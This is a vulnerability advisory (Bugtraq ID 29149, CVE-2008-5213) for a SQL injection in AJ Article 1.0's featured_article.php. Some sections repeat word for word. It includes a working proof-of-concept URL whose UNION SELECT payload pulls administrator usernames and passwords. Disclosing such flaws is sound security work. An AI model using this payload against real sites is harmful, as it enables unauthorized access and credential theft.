AJ Article 'featured_article.php' SQL Injection Vulnerability
BID:29149
Info
AJ Article 'featured_article.php' SQL Injection Vulnerability
| Bugtraq ID: | 29149 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5213 |
| Remote: | Yes |
| Local: | No |
| Published: | May 12 2008 12:00AM |
| Updated: | May 07 2015 05:29PM |
| Credit: | t0pP8uZz |
| Vulnerable: |
AJSquare AJ Article 1.0 |
| Not Vulnerable: | |
Discussion
AJ Article 'featured_article.php' SQL Injection Vulnerability
AJ Article is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects AJ Article 1.0; other versions may also be vulnerable.
AJ Article is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects AJ Article 1.0; other versions may also be vulnerable.
Exploit / POC
AJ Article 'featured_article.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof of concept is available:
http://www.example.com/featured_article.php?mode=detail&page=search&artid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(0x3C666F6E7420636F6C6F723D22726564223E,username,char(58),admin_password,0x3C2F666F6E743E),6,7,8,9,10,11,12/**/FROM/**/admin/*
Attackers can use a browser to exploit this issue.
The following proof of concept is available:
http://www.example.com/featured_article.php?mode=detail&page=search&artid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(0x3C666F6E7420636F6C6F723D22726564223E,username,char(58),admin_password,0x3C2F666F6E743E),6,7,8,9,10,11,12/**/FROM/**/admin/*
Solution / Fix
AJ Article 'featured_article.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
AJ Article 'featured_article.php' SQL Injection Vulnerability
References:
References:
- AJ Article Homepage (AJ Square)